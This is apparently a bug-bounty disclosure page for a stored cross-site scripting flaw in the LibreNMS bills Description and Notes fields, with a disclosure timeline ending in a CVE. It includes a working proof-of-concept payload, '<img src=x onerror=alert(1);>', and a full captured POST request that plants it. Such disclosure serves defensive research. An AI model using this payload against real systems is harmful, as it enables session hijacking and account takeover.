librenms bills Description & Notes Stored XSS in librenms/librenms
Valid
Reported on
Apr 12th 2022
Description
Please enter a description of the vulnerability.
Proof of Concept
- Login
- go to http://[librenms]/bills
- Click to Create Bill
- Add Description or Notes ["<img src=x onerror=alert(1);>"]
// PoC.js
POST /bills/ HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Uek0vZm92NEZkRFI5WVJBd281aVE9PSIsInZhbHVlIjoiRlZ6UEx5V3hlc1NqMlUxMkhCU0Vhb21vVHNWVXhBZnMzZkk1blRVZVEycllXTVNTTFdRVzN1akN5eEw4OVFNYXZvM2Mxd1NpeFl6MHk3UEhSSUxraTBUbWkxMkVHMXc3ZHpaaUtkMHVuQ1dWS203V3Vka3BlMWJBOEpmSGdJWGEiLCJtYWMiOiI2ZGRmYjEwNGRiNjBmNjgwNjBkYmFlNzBmYTM5MWY5OTBhM2FjN2ZjY2E1ZTdiZDQ0Y2ViMmVlMGMxYjBiOTA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZTNlBZc05YdTc5cUE5cTBObmFCb0E9PSIsInZhbHVlIjoiaklYUE94bGNRWC9oYll2VW9oVHhwZlh2aEdQR29rdk00dTdXN1JUUS9JMHNMZHYrRGJMVnVGT3FnOVBZQU04NW9peWl6amgzM0NVcDNFVVNCTC9rRlVIV0JlejRwRGh1bDl3K1lENHRDNFNRVlUxTElGMDVsbmlWS3pBeGo1WWQiLCJtYWMiOiIyZjY5N2IzNTFkODBmY2U1ZTRhODc5ZTMyOTI3ZDQ0NjdlMTVjYzEyMTlhZmQ2N2IzODlkMmVjMTQyZDFlNDBmIiwidGFnIjoiIn0%3D
_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&addbill=yes&device=-1&bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22&bill_type=cdr&bill_cdr=&bill_cdr_type=Mbps&dir_95th=in&bill_quota=&bill_quota_type=GB&bill_day=1&bill_custid=&bill_ref=&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22
Impact
It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data
We are processing your report and will contact the
librenms
team within 24 hours.
a year ago
dnr6419 modified the report
a year ago
We have contacted a member of the
librenms
team and are waiting to hear back
a year ago
We have sent a
follow up to the
librenms
team.
We will try again in 7 days.
a year ago
We have sent a
second
follow up to the
librenms
team.
We will try again in 10 days.
a year ago
We have sent a
third and final
follow up to the
librenms
team.
This report is now considered stale.
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
to join this conversation